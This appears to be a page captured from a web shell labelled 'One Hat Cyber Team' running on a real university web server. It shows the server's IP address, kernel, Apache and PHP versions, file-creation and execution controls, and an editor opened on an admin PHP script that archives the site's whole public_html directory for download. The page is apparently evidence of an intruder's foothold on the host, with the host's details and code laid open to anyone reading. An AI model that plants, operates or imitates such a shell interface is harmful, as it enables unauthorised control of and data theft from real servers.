One Hat Cyber Team
Your IP :
216.73.216.115
Server IP :
194.44.31.54
Server :
Linux zen.imath.kiev.ua 4.18.0-553.77.1.el8_10.x86_64 #1 SMP Fri Oct 3 14:30:23 UTC 2025 x86_64
Server Software :
Apache/2.4.37 (Rocky Linux) OpenSSL/1.1.1k
PHP Version :
5.6.40
Buat File
|
Buat Folder
Eksekusi
Dir :
~
/
home
/
nosc
/
public_html
/
admin
/
Edit File:
dirdump.php-old
<? $page_title="Directory structure dump"; $related_page="index.php"; require_once("../auth/auth.php"); // Unlimited execution, as long as it takes to DL set_time_limit(0); $filename = $_db_host."_".$_database."_".date("Y-M-d_H:i"); // For proper browser handling header('Content-type: application/x-tar'); header('Content-Disposition: attachment; filename="' . $filename . '.tar"'); // Make it safe $filename = escapeshellarg($filename); // the C argument is so that doesn't get included in your tarball extraction $cmd = "tar cf ".$filename.".tar /home/nosc/public_html"; $fh = popen($cmd, 'rb'); while (!feof($fh)) { print fread($fh, 8192); } pclose($fh); /*$fp = fopen($filename, 'rb'); fpassthru($fp); unlink($dump);*/ /*header("Content-Length: ".filesize($dump)); $fp = fopen($dump, 'rb'); fpassthru($fp); unlink($dump);*/ exit; ?>
Simpan